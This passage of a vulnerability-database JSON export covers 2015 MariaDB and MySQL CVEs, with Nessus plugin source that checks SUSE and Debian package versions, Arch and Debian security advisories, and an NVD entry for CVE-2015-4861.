value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\", \"CVE-2015-4816\", \"CVE-2015-4819\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", 
\"CVE-2015-4879\", \"CVE-2015-4895\", \"CVE-2015-4913\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2016:0121-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MariaDB has been updated to version 10.0.22, which brings fixes for\nmany security issues and other improvements.\n\nThe following CVEs have been fixed :\n\n - 10.0.22: CVE-2015-4802, CVE-2015-4807, CVE-2015-4815,\n CVE-2015-4826, CVE-2015-4830, CVE-2015-4836,\n CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n - 10.0.21: CVE-2015-4816, CVE-2015-4819, CVE-2015-4879,\n CVE-2015-4895\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=934401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937258\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937787\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958789\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4792/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4802/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4807/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4815/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4819/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4826/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4830/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4836/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4858/\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4861/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4870/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4879/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4895/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4913/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160121-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9391e6e6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-87=1\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2016-87=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2016-87=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-87=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient18-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient_r18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-errormessages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libmysqlclient18-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libmysqlclient18-debuginfo-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-client-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-client-debuginfo-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-debuginfo-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-debugsource-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-errormessages-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-tools-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-tools-debuginfo-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libmysqlclient18-32bit-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libmysqlclient18-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-10.0.22-20.3.1\")) flag++;\nif 
(rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mariadb-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mariadb-client-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mariadb-client-debuginfo-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mariadb-debuginfo-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mariadb-debugsource-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mariadb-errormessages-10.0.22-20.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mariadb\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:49:16", "description": "Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to the new upstream\nversion 5.5.46. 
Please see the MySQL 5.5 Release Notes and Oracle's\nCritical Patch Update advisory for further details :\n\n -\n https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-45.html\n -\n https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-46.html\n\n -\n http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html", "edition": 23, "published": "2015-10-26T00:00:00", "title": "Debian DSA-3377-1 : mysql-5.5 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2015-10-26T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:mysql-5.5", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3377.NASL", "href": "https://www.tenable.com/plugins/nessus/86580", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3377. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86580);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4816\", \"CVE-2015-4819\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4879\", \"CVE-2015-4913\");\n script_xref(name:\"DSA\", value:\"3377\");\n\n script_name(english:\"Debian DSA-3377-1 : mysql-5.5 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to the new upstream\nversion 5.5.46. 
Please see the MySQL 5.5 Release Notes and Oracle's\nCritical Patch Update advisory for further details :\n\n -\n https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5\n -45.html\n -\n https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5\n -46.html\n\n -\n http://www.oracle.com/technetwork/topics/security/cpuoct\n 2015-2367953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=802564\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-45.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-46.html\"\n );\n # https://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?404a1fb9\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/mysql-5.5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/mysql-5.5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3377\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mysql-5.5 packages.\n\nFor the oldstable distribution (wheezy), these problems have been\nfixed in version 5.5.46-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 5.5.46-0+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mysql-5.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libmysqlclient-dev\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmysqlclient18\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmysqld-dev\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmysqld-pic\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-client\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-client-5.5\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-common\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-server\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-server-5.5\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-server-core-5.5\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-source-5.5\", 
reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-testsuite-5.5\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmysqlclient-dev\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmysqlclient18\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmysqld-dev\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmysqld-pic\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-client\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-client-5.5\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-common\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-server\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-server-5.5\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-server-core-5.5\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-source-5.5\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-testsuite\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-testsuite-5.5\", reference:\"5.5.46-0+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:37", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "- CVE-2015-4913 (denial of 
service)\nallows remote authenticated users to affect availability via\nvectors related to Server : DML, a different vulnerability than CVE-2015-4858.\n\n- CVE-2015-4870 (denial of service)\nallows remote authenticated users to affect availability via unknown vectors\nrelated to Server : Parser.\n\n- CVE-2015-4861 (denial of service)\nallows remote authenticated users to affect availability via unknown vectors\nrelated to Server : InnoDB.\n\n- CVE-2015-4858 (denial of service)\nallows remote authenticated users to affect availability via\nvectors related to DML, a different vulnerability than CVE-2015-4913.\n\n- CVE-2015-4836 (denial of service)\nallows remote authenticated users to affect availability via unknown vectors\nrelated to Server : SP.\n\n- CVE-2015-4830 (denial of service)\nallows remote authenticated users to affect integrity via unknown vectors\nrelated to Server : Security : Privileges.\n\n- CVE-2015-4826 (denial of service)\nallows remote authenticated users to affect confidentiality via unknown vectors\nrelated to Server : Types.\n\n- CVE-2015-4815 (denial of service)\nallows remote authenticated users to affect availability via vectors related to\nServer : DDL.\n\n- CVE-2015-4802 (denial of service)\nallows remote authenticated users to affect availability via unknown vectors\nrelated to Server : Partition, a different vulnerability than CVE-2015-4792.\n\n- CVE-2015-4792 (denial of service)\nallows remote authenticated users to affect availability via unknown vectors\nrelated to Server : Partition, a different vulnerability than CVE-2015-4802.", "modified": "2015-10-30T00:00:00", "published": "2015-10-30T00:00:00", "id": "ASA-201510-26", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-October/000428.html", "type": "archlinux", "title": "mariadb: denial of service", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "debian": [{"lastseen": "2020-08-12T00:51:29", "bulletinFamily": 
"unix", "cvelist": ["CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3377-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nOctober 24, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mysql-5.5\nCVE ID : CVE-2015-4792 CVE-2015-4802 CVE-2015-4815 CVE-2015-4816\n CVE-2015-4819 CVE-2015-4826 CVE-2015-4830 CVE-2015-4836\n CVE-2015-4858 CVE-2015-4861 CVE-2015-4870 CVE-2015-4879\n CVE-2015-4913\nDebian Bug : 802564\n\nSeveral issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to the new upstream\nversion 5.5.46. Please see the MySQL 5.5 Release Notes and Oracle's\nCritical Patch Update advisory for further details:\n\n https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-45.html\nhttps://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-46.html\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 5.5.46-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.5.46-0+deb8u1.\n\nWe recommend that you upgrade your mysql-5.5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 9, "modified": "2015-10-24T08:07:10", "published": "2015-10-24T08:07:10", "id": "DEBIAN:DSA-3377-1:D5B01", "href": 
"https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00276.html", "title": "[SECURITY] [DSA 3377-1] mysql-5.5 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T00:51:14", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4895", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3385-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nOctober 31, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mariadb-10.0\nCVE ID : CVE-2015-4792 CVE-2015-4802 CVE-2015-4815 CVE-2015-4816\n CVE-2015-4819 CVE-2015-4826 CVE-2015-4830 CVE-2015-4836\n CVE-2015-4858 CVE-2015-4861 CVE-2015-4870 CVE-2015-4879\n CVE-2015-4895 CVE-2015-4913\nDebian Bug : 802874\n\nSeveral issues have been discovered in the MariaDB database server. The\nvulnerabilities are addressed by upgrading MariaDB to the new upstream\nversion 10.0.22. 
Please see the MariaDB 10.0 Release Notes for further\ndetails:\n\n https://mariadb.com/kb/en/mariadb/mariadb-10021-release-notes/\nhttps://mariadb.com/kb/en/mariadb/mariadb-10022-release-notes/\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 10.0.22-0+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 10.0.22-1 or earlier.\n\nWe recommend that you upgrade your mariadb-10.0 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2015-10-31T08:23:55", "published": "2015-10-31T08:23:55", "id": "DEBIAN:DSA-3385-1:73003", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00285.html", "title": "[SECURITY] [DSA 3385-1] mariadb-10.0 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB.", "edition": 6, "cvss3": {}, "published": "2015-10-21T23:59:00", "title": "CVE-2015-4861", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2015-4861"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4861", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4861", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", 